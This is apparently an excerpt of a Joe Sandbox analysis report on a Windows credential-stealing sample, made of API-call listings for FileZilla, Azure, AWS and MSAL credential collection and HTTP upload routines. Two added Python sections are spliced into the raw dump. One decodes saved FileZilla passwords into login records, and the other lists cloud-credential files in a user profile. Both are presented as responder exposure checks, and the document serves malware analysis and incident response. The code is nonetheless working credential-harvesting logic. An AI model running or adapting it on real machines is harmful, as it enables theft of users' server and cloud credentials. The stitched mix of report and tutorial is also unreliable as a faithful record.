                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                  • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                  • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                  • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                  • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                  • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                  • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                  • strtok_s.MSVCRT ref: 00410679
                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                  • memset.MSVCRT ref: 004106DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 337689325-514892060
                                  • Opcode ID: d703adcf312afa78f567e3413873f3226fbd2fc71e0b914fded6cee151632d1c
                                  • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                  • Opcode Fuzzy Hash: d703adcf312afa78f567e3413873f3226fbd2fc71e0b914fded6cee151632d1c
                                  • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
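The function above reads `\AppData\Roaming\FileZilla\recentservers.xml` into a heap buffer, scans it with StrStrA/strtok_s for the `<Host>`, `<Port>`, `<User>` and `<Pass encoding="base64">` tags, and concatenates the values behind the labels `browser: FileZilla`, `profile: null`, `url: `, `login: ` and `password: `. The following Python is an added example, not code from the report or from the sample, that reproduces that harvesting on a constructed recentservers.xml so an analyst can see which fields are exposed and what the resulting record looks like. It makes three assumptions: it uses a real XML parser instead of the sample's raw substring search; the short separator strings at 00421678/0042167C/00421688/00421698/0042169C, whose contents the report does not show, are taken to be a `:` between host and port and a newline between lines; and the `NA` string listed among the function's strings is taken to be the placeholder for a missing field.

```python
"""
Added example: re-implements the FileZilla recentservers.xml harvesting seen in
the sample's function (StrStrA on <Host>/<Port>/<User>/<Pass ...>) in Python.
Not the sample's own code; separators and the "NA" placeholder are assumptions.
"""
import base64
import xml.etree.ElementTree as ET

# Constructed sample of %APPDATA%\FileZilla\recentservers.xml (not taken from the
# analysed binary or any real host). FileZilla stores saved passwords as
# <Pass encoding="base64">...</Pass>; "aHVudGVyMg==" is base64 of "hunter2".
SAMPLE_RECENTSERVERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.0" platform="windows">
    <RecentServers>
        <Server>
            <Host>ftp.example.test</Host>
            <Port>21</Port>
            <Protocol>0</Protocol>
            <Type>0</Type>
            <User>alice</User>
            <Pass encoding="base64">aHVudGVyMg==</Pass>
            <Logontype>1</Logontype>
        </Server>
        <Server>
            <Host>sftp.example.test</Host>
            <Port>22</Port>
            <Protocol>1</Protocol>
            <Type>0</Type>
            <User>bob</User>
            <Logontype>2</Logontype>
        </Server>
    </RecentServers>
</FileZilla3>
"""

MISSING = "NA"  # assumed meaning of the "NA" string in the function's string list


def _child_text(server, tag):
    """Return the text of a child element, or the MISSING placeholder."""
    node = server.find(tag)
    if node is None or node.text is None:
        return MISSING
    return node.text.strip()


def parse_recent_servers(xml_text):
    """Extract host, port, user and (decoded) password from every <Server>."""
    entries = []
    root = ET.fromstring(xml_text)
    for server in root.iter("Server"):
        pass_node = server.find("Pass")
        if pass_node is None or not pass_node.text:
            password = MISSING
        elif pass_node.get("encoding") == "base64":
            # The sample searches for the literal '<Pass encoding="base64">' tag.
            password = base64.b64decode(pass_node.text.strip()).decode("utf-8", "replace")
        else:
            password = pass_node.text.strip()
        entries.append({
            "host": _child_text(server, "Host"),
            "port": _child_text(server, "Port"),
            "user": _child_text(server, "User"),
            "password": password,
        })
    return entries


def format_record(entry):
    """Lay the fields out under the labels the function concatenates with lstrcatA."""
    return "\n".join([
        "browser: FileZilla",
        "profile: null",
        f"url: {entry['host']}:{entry['port']}",   # ':' separator is an assumption
        f"login: {entry['user']}",
        f"password: {entry['password']}",
    ]) + "\n"


def harvest(xml_text):
    """Full pipeline: parse the file and emit one record per saved server."""
    return "".join(format_record(e) for e in parse_recent_servers(xml_text))


if __name__ == "__main__":
    print(harvest(SAMPLE_RECENTSERVERS_XML), end="")
```

Run against the constructed file, the script prints two records, the first carrying the decoded password `hunter2` and the second carrying `NA` because that server entry has no `<Pass>` element. The practical takeaway for responders is that any host on which this sample ran should have every credential in the user's recentservers.xml (and, by the same logic, sitemanager.xml) treated as compromised.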
                                  APIs
                                  • lstrlen.KERNEL32(00424DA0), ref: 022E4833
                                  • lstrlen.KERNEL32(00424E50), ref: 022E483E
                                  • lstrlen.KERNEL32(00424F18), ref: 022E4849
                                  • lstrlen.KERNEL32(00424FD0), ref: 022E4854
                                  • lstrlen.KERNEL32(00425078), ref: 022E485F
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 022E486E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022E4875
                                  • lstrlen.KERNEL32(00425120), ref: 022E4883
                                  • lstrlen.KERNEL32(004251C8), ref: 022E488E
                                  • lstrlen.KERNEL32(00425270), ref: 022E4899
                                  • lstrlen.KERNEL32(00425318), ref: 022E48A4
                                  • lstrlen.KERNEL32(004253C0), ref: 022E48AF
                                  • lstrlen.KERNEL32(00425468), ref: 022E48C3
                                  • lstrlen.KERNEL32(00425510), ref: 022E48CE
                                  • lstrlen.KERNEL32(004255B8), ref: 022E48D9
                                  • lstrlen.KERNEL32(00425660), ref: 022E48E4
                                  • lstrlen.KERNEL32(00425708), ref: 022E48EF
                                  • lstrlen.KERNEL32(004257B0), ref: 022E4918
                                  • lstrlen.KERNEL32(00425858), ref: 022E4923
                                  • lstrlen.KERNEL32(00425920), ref: 022E492E
                                  • lstrlen.KERNEL32(004259C8), ref: 022E4939
                                  • lstrlen.KERNEL32(?), ref: 022E4944
                                  • strlen.MSVCRT ref: 022E4957
                                  • lstrlen.KERNEL32(00425B18), ref: 022E497F
                                  • lstrlen.KERNEL32(00425BC0), ref: 022E498A
                                  • lstrlen.KERNEL32(00425C68), ref: 022E4995
                                  • lstrlen.KERNEL32(00425D10), ref: 022E49A0
                                  • lstrlen.KERNEL32(00425DB8), ref: 022E49AB
                                  • lstrlen.KERNEL32(00425E60), ref: 022E49BB
                                  • lstrlen.KERNEL32(00425F08), ref: 022E49C6
                                  • lstrlen.KERNEL32(00425FB0), ref: 022E49D1
                                  • lstrlen.KERNEL32(00426058), ref: 022E49DC
                                  • lstrlen.KERNEL32(00426100), ref: 022E49E7
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 022E4A03
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                  • String ID:
                                  • API String ID: 2127927946-0
                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                  • Instruction ID: 009e106bb8a8acf7574a53d722fb4305cb0b4394e5f6b449cadc73ccaecf0422
                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                  • Instruction Fuzzy Hash: A341A879740624EBC718AFE5EC89B987F71AB4C712BA0C062F90299190CBF5D511DB3E
                                  APIs
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022F9B08
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022F9B21
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022F9B39
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022F9B51
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022F9B6A
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022F9B82
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 022F9B9A
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022F9BB3
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022F9BCB
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022F9BE3
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022F9BFC
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022F9C14
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 022F9C2C
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022F9C45
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 022F9C5D
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 022F9C75
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 022F9C8E
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 022F9CA6
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 022F9CBE
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 022F9CD7
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 022F9CEF
                                  • LoadLibraryA.KERNEL32(0064A550,?,022F6C67), ref: 022F9D01
                                  • LoadLibraryA.KERNEL32(0064A17C,?,022F6C67), ref: 022F9D12
                                  • LoadLibraryA.KERNEL32(0064A104,?,022F6C67), ref: 022F9D24
                                  • LoadLibraryA.KERNEL32(0064A1DC,?,022F6C67), ref: 022F9D36
                                  • LoadLibraryA.KERNEL32(0064A328,?,022F6C67), ref: 022F9D47
                                  • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 022F9D69
                                  • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 022F9D8A
                                  • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 022F9DA2
                                  • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 022F9DC4
                                  • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 022F9DE5
                                  • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 022F9E06
                                  • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 022F9E1D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID:
                                  • API String ID: 2238633743-0
                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                  • Instruction ID: 47f074e770f5ec293270bee9bdab4cb5247edc57f0da5f447481bbcba2c624c4
                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                  • Instruction Fuzzy Hash: 3BA13CBE5D0240BFE364EFE8ED88A963BFBF74E201714661AE605C3264D7399441DB12
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022E9C53
                                    • Part of subcall function 022E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022E9C78
                                    • Part of subcall function 022E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022E9C98
                                    • Part of subcall function 022E9C27: ReadFile.KERNEL32(000000FF,?,00000000,022E16F6,00000000), ref: 022E9CC1
                                    • Part of subcall function 022E9C27: LocalFree.KERNEL32(022E16F6), ref: 022E9CF7
                                    • Part of subcall function 022E9C27: CloseHandle.KERNEL32(000000FF), ref: 022E9D01
                                    • Part of subcall function 022F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022F90B9
                                  • strtok_s.MSVCRT ref: 022F0582
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 022F05C9
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F05D0
                                  • StrStrA.SHLWAPI(00000000,00421618), ref: 022F05EC
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F05FA
                                    • Part of subcall function 022F8B47: malloc.MSVCRT ref: 022F8B4F
                                    • Part of subcall function 022F8B47: strncpy.MSVCRT ref: 022F8B6A
                                  • StrStrA.SHLWAPI(00000000,00421620), ref: 022F0636
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F0644
                                  • StrStrA.SHLWAPI(00000000,00421628), ref: 022F0680
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F068E
                                  • StrStrA.SHLWAPI(00000000,00421630), ref: 022F06CA
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F06DC
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F0769
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F0781
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F0799
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F07B1
                                  • lstrcat.KERNEL32(?,0042164C), ref: 022F07C9
                                  • lstrcat.KERNEL32(?,00421660), ref: 022F07D8
                                  • lstrcat.KERNEL32(?,00421670), ref: 022F07E7
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F07FA
                                  • lstrcat.KERNEL32(?,00421678), ref: 022F0809
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F081C
                                  • lstrcat.KERNEL32(?,0042167C), ref: 022F082B
                                  • lstrcat.KERNEL32(?,00421680), ref: 022F083A
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F084D
                                  • lstrcat.KERNEL32(?,00421688), ref: 022F085C
                                  • lstrcat.KERNEL32(?,0042168C), ref: 022F086B
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F087E
                                  • lstrcat.KERNEL32(?,00421698), ref: 022F088D
                                  • lstrcat.KERNEL32(?,0042169C), ref: 022F089C
                                  • strtok_s.MSVCRT ref: 022F08E0
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022F08F5
                                  • memset.MSVCRT ref: 022F0944
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                  • String ID:
                                  • API String ID: 3689735781-0
                                  • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                  • Instruction ID: 00932a0c0d6649626b2fe05d703a4d45960ce4dc3ccbb1e25a9b38d5e34dbdad
                                  • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                  • Instruction Fuzzy Hash: 67D15175A60308ABCB44FBE4DD55EEEB77AFF14700F504429E206A6198DF34AA09CF61
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                  • StrCmpCA.SHLWAPI(?,0088C4D8), ref: 00405A13
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0088C498,00000000,?,00885560,00000000,?,00421A1C), ref: 00405E71
                                  • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                  • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                  • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                  • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                  • memcpy.MSVCRT(?), ref: 00405EFE
                                  • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                  • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                  • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                  • HttpOpenRequestA.WININET(00000000,0088C458,?,0088BFB8,00000000,00000000,00400100,00000000), ref: 00405BF8
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 1406981993-2180234286
                                  • Opcode ID: 29c6a945f459f2f8c1075a72b727d682fe226b594e8a99ac19100750237bb99c
                                  • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                  • Opcode Fuzzy Hash: 29c6a945f459f2f8c1075a72b727d682fe226b594e8a99ac19100750237bb99c
                                  • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                  APIs
                                  • memset.MSVCRT ref: 00414D87
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                  • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                  • memset.MSVCRT ref: 00414E13
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                  • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                  • memset.MSVCRT ref: 00414E9F
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                  • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                    • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,0088C588,?,000003E8), ref: 00414A4A
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                    • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                    • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                  • memset.MSVCRT ref: 00414F2B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                  • API String ID: 4017274736-156832076
                                  • Opcode ID: c1a912e1918b28a31d7af5b1191f4ab077717743ad3d56635481e1ea4761ad81
                                  • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                  • Opcode Fuzzy Hash: c1a912e1918b28a31d7af5b1191f4ab077717743ad3d56635481e1ea4761ad81
                                  • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
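The function above is the sample's cloud-credential collector: SHGetFolderPathA resolves a profile folder, lstrcatA appends `\.azure\`, `\.aws\` and `\.IdentityService\`, and the subcall at 00414910 builds a `<dir>\*.*` pattern with wsprintfA, walks it with FindFirstFileA/FindNextFileA, skips the two StrCmpCA-filtered entries, tests each name with PathMatchSpecA, then CopyFileA's the hit into a staging folder named `Azure\.azure`, `Azure\.aws` or `Azure\.IdentityService` (the `msal.cache` and `*.*` strings are the masks in play). The following is an added exposure check, not code from the report or from the sample: it re-implements that walk in Python so a responder can list, for a given user profile, exactly which files such a harvester would have copied. Assumed, because the report does not show them: which mask applies to which directory (every directory is checked against both), the profile base path (taken as an argument), and the constructed profile layout used for demonstration.

```python
"""Exposure check: which files would the .azure/.aws/.IdentityService walk collect?

Added example; not code from the Joe Sandbox report or from the analysed sample.
"""
import fnmatch
import tempfile
from pathlib import Path

# Target directories and staging names, taken from the report's String ID list.
TARGETS = {
    ".azure": "Azure\\.azure",
    ".aws": "Azure\\.aws",
    ".IdentityService": "Azure\\.IdentityService",
}
# Masks listed in the report. Assumption: each directory is checked against both,
# since the report does not show which mask is used for which directory.
MASKS = ("*.*", "msal.cache")


def matches(name: str, mask: str) -> bool:
    """Approximate the Win32 wildcard semantics used by the sample's loop.

    FindFirstFileA("<dir>\\*.*") returns every file, including names with no dot
    (e.g. the AWS "credentials" file), so "*.*" is treated as match-all here.
    Any other mask is matched as a case-insensitive glob.
    """
    if mask == "*.*":
        return True
    return fnmatch.fnmatch(name.lower(), mask.lower())


def find_cloud_credential_files(profile_dir, masks=MASKS):
    """Return [(staging_name, relative_path)] for every file the walk would copy.

    Only the top level of each target directory is listed: the report shows one
    FindFirstFileA/FindNextFileA loop per directory and no evidence of recursion.
    """
    hits = []
    base = Path(profile_dir)
    for dirname, staging in TARGETS.items():
        target = base / dirname
        if not target.is_dir():
            continue
        # The sample's StrCmpCA checks drop "." and ".."; Path.iterdir never yields them.
        for entry in sorted(target.iterdir()):
            if entry.is_file() and any(matches(entry.name, m) for m in masks):
                hits.append((staging, f"{dirname}/{entry.name}"))
    return hits


def build_constructed_profile() -> str:
    """Create a throwaway profile tree for demonstration (constructed data only)."""
    root = tempfile.mkdtemp(prefix="profile_")
    layout = {
        ".azure/msal_token_cache.bin": b"constructed",
        ".azure/azureProfile.json": b"{}",
        ".aws/credentials": b"[default]\naws_access_key_id = EXAMPLEKEY\n",
        ".IdentityService/msal.cache": b"constructed",
        "Documents/notes.txt": b"not a target",
    }
    for rel, data in layout.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)
    return root


if __name__ == "__main__":
    root = build_constructed_profile()
    for staging, rel in find_cloud_credential_files(root):
        print(f"{rel} -> {staging}")
```

Run it against a real profile (`find_cloud_credential_files(Path.home())`) on a host where the sample executed to get the list of Azure CLI, MSAL and AWS credential files that must be treated as compromised and rotated; the `msal.cache`-only mask variant shows how little the narrower pattern would miss.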
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
